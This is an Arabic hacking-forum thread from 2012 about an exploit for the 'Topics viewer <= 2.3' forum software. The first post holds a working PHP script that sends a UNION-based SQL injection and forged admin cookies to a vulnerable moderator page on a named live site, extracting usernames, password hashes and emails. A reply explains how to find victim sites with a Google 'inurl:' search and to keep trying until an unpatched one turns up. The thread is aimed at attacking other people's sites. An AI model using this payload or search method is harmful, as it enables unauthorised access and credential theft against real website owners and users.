يمنع منعاً باتاً رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com
مطلوب طاقم إشراف وأدارة للمنتدى, للمعنيين بالرجاء التواصل مع الادارة على البريد التالي :
vbspiders.network@gmail.com


العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 07-05-2012, 09:12 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 

 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road

مطلوب غير مجاب: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection


السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3

فهمت تقريبآ 60%

class="smallfont">اقتباس
<?

$host="http://www.el3drabyad.com/"; //ضع الموقع المصاب بدل هذا الموقع واستعرض الملف من المتصفح

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $host."/modcp/rmv_topic_pop.php?id=-1+/*!union*/+/*!SELeCT*/+1,group_concat(u_name,0x3a,u_mpass,0x3a,u_email), 3,4,5,6,7,8,9,10,11,12+/*!frOm*/+users--");

curl_setopt($ch, CURLOPT_******, "admin=ahwak2000;mod=ahwak2000;");

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);

curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);

$buffer = curl_exec($ch);

if(strpos($buffer,"style.css"))
{

echo "<br> [-]---------------------------------------------[-]<br>";

$reg = '#<li .*>.*:(.*?)؟</span></li>#Us';

preg_match($reg,$buffer,$ahwak);

$s1=explode(",",$ahwak[1]);
$i=1;

foreach($s1 as $ayrik){

print "<br> <b>[$i] ".trim($ayrik)."</b><br>";

$i++;

}

echo "<br> [-]---------------------------------------------[-]<br><b><font color=red>z.u5@hotmail.com</font></b>";

}

?>

طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?

+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC p,g eyvm Topics viewer <= 2>3 Authentication Bypass & SQL Injection

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم
من كل انسان ظلـمـتــــه
استغفر الله العظيم
من كل صالح جـفــوتــــه
استغفر الله العظيم
من كل ظالم صاحـــبتــه
استغفر الله العظيم
من كل بـــر أجـــــلتـــــه
استغفر الله العظيم
من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-05-2012, 07:00 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Abo MalaK
السلام عليكم ورحمة الله وبركاته

المهم

حصلت ثغره جديده توها نزلت
http://pastebin.com/KqFCfyc3

فهمت تقريبآ 60%


طيب هذا الاستغلال تمام،!!
الي مافهمته هل استعرضه بمتداد html>?

+
دوركت لها لاني حآولت بها ماقدرت
+
كيف اعرف هل الموقع مصاب بالثغره ام لا

بنتضآركم


اكيد اخى العزيز الموقع ينتهى مثل هذا
.php?id=

ثانيا الاسكربت المصاب الذى ستبحث عنه
/modcp/rmv_topic_pop.php?

ويمكنك ان تقوم بعمل التالى
inurl:
ثم تضع بعدها اسم الاسكربت المصاب فى محرك البحث جوجل ثم تبدأ بالاختبار على عدة مواقع
وملحوظة لا تيأس اذا وجدت عديد من المواقع تم ترقيع الثغرة منها واستمر فى المحاولة وتذكر دائما ان الصبر احد الاركان الاساسية للنجاح
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس
قديم 07-06-2012, 03:48 AM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 

 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road

افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection


شآكر لتفاعلك ،

بس الدوركت مستحيل يكون

/modcp/rmv_topic_pop.php?

لآن ماطلع ولا موقع،

بعدين الاستغلال هل احفظ الثغره بصيغة html واستغل؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم
من كل انسان ظلـمـتــــه
استغفر الله العظيم
من كل صالح جـفــوتــــه
استغفر الله العظيم
من كل ظالم صاحـــبتــه
استغفر الله العظيم
من كل بـــر أجـــــلتـــــه
استغفر الله العظيم
من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
قديم 07-07-2012, 12:45 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية Abo MalaK
 

 

 
إحصائية العضو







Abo MalaK غير متواجد حالياً

إرسال رسالة عبر MSN إلى Abo MalaK

 

 

إحصائية الترشيح

عدد النقاط : 10
Abo MalaK is on a distinguished road

افتراضي رد: حول ثغرة Topics viewer <= 2.3 Authentication Bypass & SQL Injection


الآستغلال لحد الآن ماوصلت له،

هل اعدل على كود الثغره ام انفذ امر
php rmv_topic_pop.php site.com/path/

؟

التوقيع

استغفر الله العظيم
استغفر الله العظيم من كل فرض تركـــــتــه
استغفر الله العظيم
من كل انسان ظلـمـتــــه
استغفر الله العظيم
من كل صالح جـفــوتــــه
استغفر الله العظيم
من كل ظالم صاحـــبتــه
استغفر الله العظيم
من كل بـــر أجـــــلتـــــه
استغفر الله العظيم
من كل ناصح أهنــتـــــه
++
دعوآتكم لي،

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:33 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0